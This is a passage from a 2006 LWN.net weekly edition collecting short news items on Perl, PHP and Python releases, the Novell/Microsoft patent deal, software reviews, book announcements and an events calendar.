chromatic discusses the use of Perl and cross-platform shared libraries in an O'Reilly article. "I have a little project called Parrot::Embed. It’s a Perl 5 extension that makes Parrot available to Perl 5 programs. Parrot makes a shared library called libparrot. The actual parrot executable is usually just a little program which uses this shared library. This is very handy for my extension; I can use all of the public functions in the shared library myself. Actually building this code is trickier than it should be, however. Linking Perl 5 to libparrot requires a little bit of C code, itself a shared library that perl can load through the DynaLoader module. That’s easy and handy and even though I know how it works, I don’t need to know how it works in order to use it. When Parrot::Embed loads, it attempts to load libparrot and that’s where my troubles begin. Why?"

Comments (none posted)

Weekly Perl 6 mailing list summary (O'Reilly)

The Weekly Perl 6 mailing list summary for October 29 - November 4, 2006 is out with coverage of the Perl 6 mailing lists.

Comments (none posted)

PHP

PHP 5.2.0 released

Version 5.2.0 of PHP has been announced. "This release is a major improvement in the 5.X series, which includes a large number of new features, bug fixes and security enhancements." See the release announcement for more information.

Comments (none posted)

Python

PyEnchant 1.2.0 released

Version 1.2.0 of PyEnchant has been announced; it includes several new capabilities. "Enchant is the spellchecking package behind the AbiWord word processor, is being considered for inclusion in the KDE office suite, and is proposed as a FreeDesktop.org standard. It's completely cross-platform because it wraps the native spellchecking engine to provide a uniform interface. PyEnchant brings this simple, powerful and flexible spellchecking engine to Python".

Comments (none posted)

python-dev Summary

The python-dev Summary is out with coverage of the python-dev mailing list for the period of September 1-15, 2006.

Full Story (comments: none)

python-dev Summary

The python-dev Summary is out with coverage of the python-dev mailing list for the period of September 16-30, 2006.

Full Story (comments: none)

Dr. Dobb's Python-URL!

The November 7, 2006 edition of Dr. Dobb's Python-URL! is online with a new collection of Python article links.

Full Story (comments: none)

Tcl/Tk

Dr. Dobb's Tcl-URL!

The November 7, 2006 edition of Dr. Dobb's Tcl-URL! is online with new Tcl/Tk articles and resources.

Full Story (comments: none)

XML

Migrating to XForms (O'Reilly)

Paul Sobocinski works with XForms on O'Reilly's XML.com. "Paul Sobocinski explains how to start using XForms now by showing PHP code that will convert from XHTML to XForms and back to XHTML."

Comments (none posted)

Page editor: Forrest Cook

Linux in the news

Recommended Reading

Ten ideas about Ideas (Linux Journal)

Doc Searls has some ideas about ideas and venture capital. "Which has more leverage in the marketplace -- A) disclosure or B) secrecy? Which is more supportive of growing markets -- A) public infrastructure or B) private platforms? Which is better for inventive entrepreneurs -- A) sharing one's great ideas to drive development and adoption, or B) patenting and keeping secret one's "intellectual property"? I'm sure most Linux Journal readers would answer "A" to each of those questions, plus other questions like them. Yet I suspect that most venture capitalists would rather fund the "B" choices."

Comments (1 posted)

Red Hat downplays Novell/Microsoft deal (ArsTechnica)

ArsTechnica looks at Red Hat's response to the Novell/Microsoft announcement. "In response to a recent agreement between Microsoft and Novell, Red Hat's corporate secretary Mark Webbink has predicted that Red Hat "will be the dominant player in the Linux market" a year from now, and that "by that time there won't be any other Linux players." In light of Microsoft's partnership with Novell and Oracle's ambitions of Linux support dominance, Webbink's statement doesn't seem all that realistic."

Comments (23 posted)

Linux on More Dell Client Systems? (Direct2Dell)

The Direct2Dell blog discusses the topic of Linux on client systems. "If you buy a Dell notebook and run Linux on it, does Dell's hardware warranty still apply? Absolutely. You'll need to demonstrate you're having a hardware problem using the Dell Diagnostics CD. Will Dell (today) provide full Linux software support for that system? No. You'll be counting on a community support model for software issues, but many people are already a part of that global community and it suits them just fine." (Found on Don Marti's blog.)

Comments (38 posted)

Trade Shows and Conferences

2006 Italian Linux Day: A nationwide success (Linux.com)

Linux.com covers the 2006 Italian Linux Day. "The 2006 edition of Italian Linux Day on October 28 was the first in the six-year history of the event to be celebrated in more than 100 cities in every corner of the country. The prime-time news program on the main national TV channel TG1 spent almost two minutes on a story about the event ("and they didn't even make mistakes!", a LUG activist said)."

Comments (none posted)

Companies

Motorola picks home for its open-source Java (ZDNet)

ZDNet looks at Motorola's plans for their Java Micro Edition. "Motorola plans to build an open-source version of Java for gadgets such as mobile phones within the framework of the Apache Software Foundation. The work to develop the Java Micro Edition (ME) software will use the Apache License, Motorola said Tuesday, inviting others to participate in creating "a complete Java ME software stack." The move follows the company's pledge in May to release its software relating to a cell phone variant of Java ME called MIDP (Mobile Information Device Profile) 3.0."

Comments (none posted)

Novell and Microsoft partnering on Linux? (Linux-Watch)

Linux-Watch discusses a possible deal between Novell and Microsoft. "Sources close to Novell indicate that a deal with Microsoft concerning Linux will be announced today, Nov. 2, at 2 PM Pacific time in San Francisco. While this may sound as likely as George Bush and John Kerry singing a duet together, the Wall Street Journal is reporting that Microsoft Corp. will be announcing it will offer sales support for Novell Inc.'s SUSE Linux family."

Comments (27 posted)

Why Microsoft won't assault Linux (ZDNet)

John Carroll - who happens to work for Microsoft - talks about why he thinks Microsoft will not go after Linux in this ZDNet posting. "It sure looks like Microsoft is working very hard to achieve a detente with open source. They are working with Zend to improve the PHP developer experience atop Windows. They are granting full access to the source code for Windows CE 6.0 (though that benefits Microsoft as much as programmers). They just blessed Mono, an open source version of the .NET runtime, through their Novell agreement. What's the point of all that if they are just going to light the world on fire with subsequent legal bombs on Linux?"

Comments (11 posted)

Linux Adoption

Behind the upsurge in Chinese open source communities (NewsForge)

NewsForge takes a look at Linux in China. "When Novell and Red Hat set up open source communities in China last year, most Chinese companies merely watched. Recently, however, China-based software companies have begun to show a greater interest in creating communities of their own. TurboLinux and Red Flag have created Whitefin and Linux-Ren, respectively. Red Flag also plans to create two additional open source communities -- UMPC (with Intel) and OpenAsianux -- before the end of this year. Why have Chinese companies suddenly changed their tunes?"

Comments (none posted)

LiMux The Penguin: Deep into Munich's Linux F/OSS migration (LinuxWorld)

LinuxWorld Magazine looks at the city of Munich and its move to Linux. "Munich's Linux migration has been a publicity frenzy, a software patent poster child, and the subject of a debate on the role of government in technology mandates. Now it's a real-life IT project, and the key to success is training, management, and replacing 170 non-Linux applications."

Comments (none posted)

Legal

JPEG Patent Claim Surrendered! (Groklaw)

The JPEG patent claims are over, according to this article on Groklaw. "Here you go, straight from the Public Patent Foundation's press release: Forgent Networks has stopped asserting its patent against JPEG, has dropped all its pending cases that were asserting the patent, and says that it won't file any other infringement claims based on the patent. You'll recall that PubPat challenged the patent last year and the USPTO reexamination led to rejection of the broadest claims."

Comments (1 posted)

Interviews

KDE and Distributions: MEPIS Interview (KDE.News)

KDE.News has posted an interview with Warren Woodford. "The MEPIS distribution has been one of the bigger KDE-centric distributions around for some years now, created to make desktop GNU/Linux easier to use. As part of our KDE and Distributions series founder and main contributor Warren Woodford talks to KDE Dot News about the history and current vision of the distribution."

Comments (none posted)

Inside the Hacker's Profiling Project (NewsForge)

NewsForge has an interview with Stefania Ducci, co-founder of the Hacker's Profiling Project (HPP). "Imagine being able to preview an attacker's next move based on the traces left on compromised machines. That's the aim of the Hacker's Profiling Project (HPP), an open methodology that hopes to enable analysts to work on the data (logs, rootkits, and any code) left by intruders from a different point of view, providing them with a profiling methodology that will identify the kind of attacker and therefore his modus operandi and potential targets."

Comments (11 posted)

Resources

Setting Up a Game Server with BZFlag (Linux Journal)

The Linux Journal has a lengthy article (a book chapter, actually) on setting up a BZFlag server. "BZFlag is a fun 3D tank battle game, designed to be played against others over a network. After you set up a BZFlag server, you can have players battle each other over the network using clients on other Linux, BSD, Mac OS X, or Windows systems."

Comments (1 posted)

Scaling Enterprise Java on 64-bit Multi-Core X86-Based Servers (O'ReillyNet)

Michael Yuan and Dave Jaffe discuss the implementation of Enterprise Java on 64 bit systems in an O'Reilly article. "Today's enterprise server--indeed, the environment--isn't what it was when Java was born. Slow networked machines have been replaced by fast, 64-bit multi-core servers that can house all your tiers in one box or even virtualize servers within the server. This has a significant effect on the design and deployment of your Java enterprise application, and Michael Yuan and Dave Jaffe show you how to get the most out of your hardware."

Comments (none posted)

Linux Gazette #132 is out!

Issue #132 of the Linux Gazette has been announced. "Linux Gazette is a volunteer-run monthly web magazine dedicated to two simple ideas: making Linux a little more fun, and sharing ideas and discoveries."

Full Story (comments: none)

Mathematics on a UNIX workstation (IBM developerWorks)

Bill Zimmerly discusses a number of UNIX compatible mathematics tools in an IBM developerWorks article. "Mathematics is the King of Science. Commercial uses for mathematical workstations are vast: From basic engineering to designer drugs and from gene therapy to celestial navigation, mathematics rules the world. And there is no lack of computer programs to assist people in solving mathematical problems in their chosen field. The remainder of this article describes several commercial and open source systems that might prove valuable in your field of endeavor."

Comments (none posted)

Remotely Manage Machines Using VNC (Debian Admin)

Debian Admin is running a tutorial article on the use of VNC software under Debian. "VNC stands for Virtual Network Computing. It is, in essence, a remote display system which allows you to view a computing ‘desktop’ environment not only on the machine where it is running, but from anywhere on the Internet and from a wide variety of machine architectures."

Comments (none posted)

Reviews

Of Macros And Drum Machines (Linux Journal)

Dave Phillips looks at two very different software drum machines. "This week in my random survey of activity on the mail-lists for Linux sound & music software I'll look at two very different software drum machines and a keystroke macro that enters LilyPond music notation into an Open Office text document. And if that isn't enough I've included four thrilling screenshots and links to three entertaining audio files to entice and maintain your interest. Read on for more..."

Comments (none posted)

Review: GnuCash 2.0 (Linux.com)

Linux.com reviews GnuCash. "GnuCash is a personal and small business accounting package that provides true double-entry accounting, the ability to set up automatic recurring transactions, and simple budgeting. The application does not try to hide the complexities of managing your money from you with pretty screens. It does show you where (and how much) you're spending your money. If you're prepared to learn a subtly different way of doing things, you will find GnuCash a very powerful alternative for home or small business use."

Comments (2 posted)

Downloading bliss with Metalink (Linux.com)

Linux.com looks at Metalink. "Getting popular software off the Internet can sometimes be a struggle, even with all the mirrors and BitTorrent Samaritans out there. When the Fedora project released Fedora Core 6 last month, for instance, even several dozen mirrors weren't enough to serve everyone, and torrent speeds weren't good enough because of a scarcity of seeders. But thanks to Metalink I was able to sleep while my FC6 ISOs were downloading."

Comments (4 posted)

QBrew: Home-brewed software for home brewers (NewsForge)

NewsForge reviews QBrew. "When I'm not hacking or writing about hacking, I'm brewing beer. When I say I'm brewing beer, I don't mean that I'm taking some syrupy stuff and adding it to boiling water and hoping for the best. I mean I'm buying various types of grains, various types of hops, some yeast, and potentially some other additives to help balance my brewing water or the pH levels at some point in my brewing process. Now, you can't go throwing all of this stuff together in random quantities and expect to hit your target flavor or style of beer. You need a recipe. This is where QBrew comes in. QBrew is an open source application to aid you in developing a recipe for home brewed beer."

Comments (1 posted)

Righteous Software Releases Linux-based Backup Server (W3Reports)

W3Reports looks at Righteous Backup Server from Righteous Software, a commercial application. "The new product, which offers nearly continuous backups for Linux servers—a technology that remains unmatched in the industry—runs on a standalone server and can provide disk-based backup services for up to three hundred Linux servers simultaneously. The solution also includes open file backups, point-in-time snapshots, and requires no 3rd party applications."

Comments (none posted)

Smart Boards Get Linux Support (EFYTimes)

EFYTimes reviews a Linux-compatible electronic white board from SMART Technologies Inc. "“Linux, which is increasing in popularity around the world, provides a highly functional operating system for SMART product users,” says Nancy Knowlton, SMART’s president and co-CEO. “The release of SMART Board software 9.5 for Linux demonstrates SMART’s commitment to meeting the ever-evolving needs of our customers worldwide.” SMART Technologies Inc. develops software to control the interaction between smart board and a computer system. Smart Board is an electronic whiteboard writing surface which can capture writing electronically in group presentation situations such as teaching."

Comments (none posted)

VMX Builder: Create virtual machines in minutes (Linux.com)

Linux.com takes a look at VMX Builder. "While VMware Player is not designed to create virtual machines from scratch, other tools can help you to build your own VMs in a matter of minutes. You could use VMware's free VMware Server software, but it's overkill if you only need a quick-and-dirty way to build a VM. Instead, consider VMX Builder, an easy-to-use desktop tool for creating VMware virtual machines."

Comments (3 posted)

Miscellaneous

Liberating iPods in Cambridge (NewsForge)

Benjamin Mako Hill covers an iPod Liberation event in Cambridge. "Last month, the MIT Media Lab Computing Counter Culture Group and the Harvard Free Culture Group held an "iPod Liberation event" -- a RockBox and iPodLinux "installfest" for Apple iPods. The event was held as a response to the fact that Apple installs iPods with an operating system -- a "firmware" -- that conflicts with the ideals of free and open source software and free culture and treats users paternalistically and adversarially. During the event, dubbed iRony, users were walked through the process of installing flexible and featureful free/open source software firmware -- without DRM -- onto their digital audio players."

Comments (none posted)

Can open source methodology make a movie? (NewsForge)

NewsForge looks at the creation of the film "Digital Tipping Point" using open-source techniques. "However, only about 220 minutes of film have been posted online. The film segments are being made available on the Internet Archive under the Creative Commons Attribute-ShareAlike license. The project also has a four-minute proof of concept video on the Internet Archive and YouTube, but it's far from a completed film. At this point, the project is soliciting help from the open source community in doing post-production work on the film -- including transcription of scenes in the archive, edits of the footage, translations, and providing plot suggestions for the film."

Comments (none posted)

Researching Web Science (PC Magazine)

PC Magazine covers the launch of the Web Science Research Initiative, one of whose founders is Tim Berners-Lee. "This morning, the Massachusetts Institute of Technology MIT and the University of Southampton announced The Web Science Research Initiative (WSRI), basically a group designed to set a research agenda for understanding the scientific, technical and social challenges underlying the growth of the Web. WSRI will be headquartered at the Computer Science and Artificial Intelligence Laboratory (CSAIL) at MIT and at the School of Electronics and Computer Science (ECS) at the University of Southampton. Initial plans call for joint research projects, workshops and student/faculty exchanges between the two institutions."

Comments (none posted)

Page editor: Forrest Cook

Announcements

Non-Commercial announcements

Linuxaudio.org announces new members

Linuxaudio.org, a not-for-profit consortium of libre software projects and artists, companies, institutions, organizations, and hardware vendors, has announced its newest members. "In its bi-monthly membership update, Linuxaudio.org is pleased to announce nine new members, bringing the total number of members to fifty two".

Full Story (comments: none)

OpenVZ now available on the latest Linux kernel

The OpenVZ project has announced availability of beta level software based on the Linux kernel 2.6.18.

Full Story (comments: none)

Google Pledges Annual Donation to Samba

The Samba project has announced the pledge of an annual donation by Google. "The Samba Team is delighted to announce that Google has committed to providing the Samba project with an annual donation of US $20,000.00. "This is fantastic news for the Samba project" said team member Andrew Tridgell, "and will allow us to provide more support for developers who could not otherwise afford the travel expenses to attend conferences. Contributions like these make a huge difference!"."

Comments (none posted)

Commercial announcements

Accenture Joins The Open Group

The Open Group has announced its latest member, Accenture. "Accenture will serve on The Open Group's Architecture Forum, which identifies and establishes standards for the development of enterprise-wide information systems."

Comments (none posted)

AdventNet upgrades ManageEngine firewall analyzer

AdventNet Inc. has announced the release of version 4.0 of its ManageEngine Firewall Analyzer. "ManageEngine Firewall Analyzer is an enterprise-class, vendor-neutral software for firewall log analysis. It enhances the availability and security of your network by continuously collecting, analyzing, and reporting on the firewall traffic logs. Firewall Analyzer supports almost all major firewalls including Cisco Pix, CheckPoint, NetScreen, WatchGuard, SonicWall, FortiGate and many more!"

Comments (none posted)

CA joins Community Patent Review Project as lead sponsor

CA has announced that it has joined the Community Patent Review Project. "Selected by the U.S. Patent & Trademark Office (USPTO) as one of its strategic initiatives to improve and streamline the patent application review process, the Community Patent Review project is a collaborative effort between USPTO and New York Law School's Institute for Information Law & Policy. The project will deploy an online system to allow the scientific community to provide input into the patent examination process."

Comments (none posted)

Cleversafe announces the Cleversafe Desktop

Cleversafe has announced the release of the Cleversafe Desktop, an open-source application for managing dispersed storage grids. "The Cleversafe Desktop will provide a way for anyone -- technical or not -- to take advantage of Dispersed Storage, and complements Cleversafe's other interfaces, Command Line Interface (CLI), Dispersed Storage Grid File System (DSGFS) and Dispersed Storage API (DSAPI)."

Comments (none posted)

Novell's press release on partnership with Microsoft

Here is Novell's press release on its deal with Microsoft. There are a number of aspects to it, including joint marketing of products, the establishment of a shared research facility to work on topics like virtualization and document formats, and a patent deal: "As part of this agreement, Microsoft will provide a covenant not to assert its patent rights against customers who have purchased SUSE Linux Enterprise Server or other covered products from Novell, and Novell will provide an identical covenant to customers who have a licensed version of Windows or other covered products from Microsoft."

Comments (63 posted)

Some more details from Novell

Here's a new press release from Novell on its Microsoft deal. The company is getting almost $250 million from Microsoft up front. There are some real weasel words with regard to the GPL: "Under the patent cooperation agreement, Novell's customers receive directly from Microsoft a covenant not to sue. Novell does not receive a patent license or covenant not to sue from Microsoft, and we have not agreed with Microsoft to any condition that would contradict the conditions of the GPL. Our agreement does not affect the freedom that Novell or anyone else in the open source community, including developers, has under the GPL and does not impose any condition that would contradict the conditions of the GPL." Some serious hair-splitting is going on here.

Comments (36 posted)

The OpenMoko open phone

A company called OpenMoko has announced the availability of "a completely integrated open source mobile communications platform." It's based on the OpenEmbedded platform and is meant to be hackable. Some pictures are available on the OpenMoko site. Much of the system-level software was done by Harald Welte, who says "So basically, from a Free Software community level, this is exactly the kind of phone you want to get involved with, and play with. Yes, it's not the perfect phone. It runs a proprietary GSM stack on a separate processor. There are some minor, self-contained proprietary bits on the back end side in userspace. But well, it's probably the best you can do as a first shot of a new generation of devices, and without too much existing market power to put on upstream vendors."

Comments (none posted)

XenSource announces XenEnterprise for Windows and Linux

XenSource, Inc. has announced XenEnterprise for Windows and Linux, a commercially-packaged Xen virtualization solution supporting both Microsoft Windows and Linux guests.

Full Story (comments: none)

Xilinx announces Virtex-5 LXT logic design solution

Xilinx, Inc. has announced a logic design system for their Virtex-5 LXT FPGA chips. "Xilinx, Inc. today announced availability of a complete logic design solution including an update to its Integrated Software Environment (ISE(TM)) design tools for their newest Virtex(TM)-5 LXT Platform FPGAs, the industry's first FPGA to deliver hard-coded PCI Express(R) technology and Tri-mode Ethernet Media Controller (MAC) blocks. ISE 8.2i delivers a unique integrated timing closure environment and productivity-enhancing features, allowing users to fully exploit the connectivity, performance, and power advantages of the Virtex-5 LXT family."

Comments (none posted)

New Books

The Compleat Canadian Copyright Act 1921-2006

The second edition of the book The Compleat Canadian Copyright Act 1921-2006 has been published. "It is a reference work documenting 85 years of the shifting balance of power between creators, users, proprietors, Parliament and foreign interests reflected in the changing provisions of the Act. It is the record of legislative attempts to accommodate new ways, new technologies, to fix the expression of ideas or knowledge into a material matrix thereby creating new subject matter for copyright, e.g., ‘talking’ pictures, radio and television, VCRs, DVDs, WWW, et al and in the process creating streams of royalties to be gained through their exploitation."

Full Story (comments: none)

Rocky Nook releases "GIMP 2 for Photographers"

Rocky Nook has published the book GIMP 2 for Photographers by Klaus Goelker.

Full Story (comments: none)

Learning JavaScript - O'Reilly's Latest Release

O'Reilly has published the book Learning JavaScript by Shelley Powers.

Full Story (comments: none)

Prentice Hall Professional Releases Second Edition of Linux Administration Handbook

Prentice Hall Professional has published the book Linux Administration Handbook, second edition by Evi Nemeth, Garth Snyder and Trent R. Hein.

Full Story (comments: none)

Syngress Releases "WarDriving and Wireless Penetration Testing"

Syngress Publishing, Inc. has published the book WarDriving & Wireless Penetration Testing by Chris Hurley, Frank Thornton, Dan Connelly, Brian Baker, and edited by Russ Rogers.

Full Story (comments: none)

Resources

The Austin Group announces the availability of revision draft 2

The Austin Group has released the second draft of the Austin Group specifications. "We're pleased to announce the availability of draft 2 of the Revision to the Austin Group specifications. This is the second draft of the revision project and is a ballot draft with IEEE and ISO balloting, for the full roadmap to the revision see Austin/319."

Full Story (comments: none)

The Open Group announces new API sets for single UNIX Specification

The Open Group has announced the publication of new API sets for the next revision of the Single UNIX Specification. "Developed by The Open Group's Base Working group, the Open Group Technical Standards Extended API Sets Part 1 to 4 add eighty-eight new interfaces. The new interfaces include support for the use of locales in multi-threaded applications, the addition of robust mutexes, a set of filesystem routines that avoid common race conditions, and a number of widely used interfaces drawn from the open source community."

Full Story (comments: none)

The Python Journal lives again!

Richard Jones reports on the return of the Python Journal. "The Python Journal has been resurrected. We're still sorting out some bits, but we're pretty happy with the first issue. I'll be helping out on the technical side, sorting out typesetting and the website. There might even be some articles from me, though I'll be dealing with OSDC 2006 first."

Comments (none posted)

Education and Certification

PostgreSQL CE 8 Silver Release

A new PostgreSQL certification exam has been announced. "PostgreSQL CE is a certification exam for PostgreSQL engineers who are involved in system development, administration, maintenance, etc. The first English version of PostgreSQL was released in March 2005, and was based on PostgreSQL 7.4. The newest exam to be released this time will be based on PostgreSQL 8.0, which includes PITR, Tablespace and so on."

Comments (none posted)

Event Reports

Presentations and Projects Plentiful at Gelato ICE

Gelato presents coverage of the recent Gelato ICE: Itanium(r) Conference & Expo in Singapore. "Over 100 scientists, developers, and engineers from more than 30 companies and institutions convened from all around the globe for the October 2006 Gelato ICE: Itanium(r) Conference & Expo held in Singapore."

Full Story (comments: none)

Plone Conference 2006 blows away (z3lab.org)

z3lab.org presents coverage of the 2006 Plone Conference. "This is how my first day (or shall I say evening?) in Seattle started. Alex Limi later reported in his keynote that he had a similar conversation in a taxicab, except his driver actually knew what Open Source and SourceForge were. That's almost hard to believe. Fact is, though, Plone's more popular than ever. And so I was not the only one who came to the city that is usually better known for its proprietary software vendor. 360 other people decided to do so, too! There are some statistics about that number that are worth mentioning".

Comments (none posted)

Calls for Presentations

2007 PHP Quebec Conference CFP

A call for proposals has gone out for the 2007 PHP Quebec Conference. The event takes place on March 14-16, 2007 in Montreal, Canada; submissions are due by November 17.

Comments (none posted)

RailsConf 2007 CFP

A Call for Participation has gone out for RailsConf 2007. The event takes place from May 17-20, 2007 in Portland, Oregon; proposals are due by November 27.

Full Story (comments: none)

Upcoming Events

OpenOffice.org 2007 Conference - Call for Location

A call for location has gone out for the OpenOffice.org 2007 Conference. "The annual OpenOffice.org Conference continues to go from strength to strength, with this year's glittering event in Lyon, France attracting over 600 registrations and enjoying a civic reception laid on by the Mayor of Lyon in the historic town hall. Can your team do even better next year? We are collecting applications from teams who are willing to organize OOoConf 2007."

Full Story (comments: none)

Pd Q and Faust interfaces / ICMC 2006 demo

Albert Graef will be holding demos of the Pd Q and Faust interfaces at the ICMC 2006 conference in New Orleans, Louisiana on November 11. "Yann and I will show Faust, Q and their Pd and SuperCollider interfaces at the International Computer Music Conference (ICMC) next week in New Orleans, so if you have an opportunity to come we hope to meet you there."

Full Story (comments: none)

Events: November 16, 2006 to January 15, 2007

The following event listing is taken from the LWN.net Calendar.

Date(s)               Event                                                  Location
November 11-17        Supercomputing 2006                                    Tampa, FL, USA
November 14-16        LinuxWorld Cologne                                     Cologne, Germany
November 16-17        III Latin American Free Software Conference            Iguassu Falls, Brazil
November 16-17        Conference on Software Patents                         Boston, MA, USA
November 18           Richard Stallman speaks in Seoul                       Seoul, South Korea
November 21-24        15th International Conference on Computing             Mexico City, Mexico
November 24-26        FOSS.IN 2006                                           Bangalore, India
November 25           FAVE 2006 - free software multimedia event in London   London, UK
November 27-30        PacSec Applied Security Conference 2006                Tokyo, Japan
December 1-2          PHP Conference Brasil                                  Sao Paolo, Brazil
December 2-3          Technical Dutch Open Source Event                      Eindhoven, the Netherlands
December 3-8          Large Installation System Administration Conference    Washington, D.C.
December 5-8          Open Source Developers' Conference 2006                Melbourne, Australia
December 7-8          Desktop Architects Meeting                             Portland, OR, USA
December 9            London Perl Workshop                                   London, England
December 12-19        Virtual Congress UnInet Meeting UMeet'2006             irc.uninet.edu, #linux
December 27-30        23rd Chaos Communication Congress 2006                 Berlin, Germany
January 11-12         Foundations of Open Media Software                     Sydney, Australia

If your event does not appear here, please tell us about it.

Page editor: Forrest Cook

Copyright © 2006, Eklektix, Inc.
Comments and public postings are copyrighted by their creators.
Linux is a registered trademark of Linus Torvalds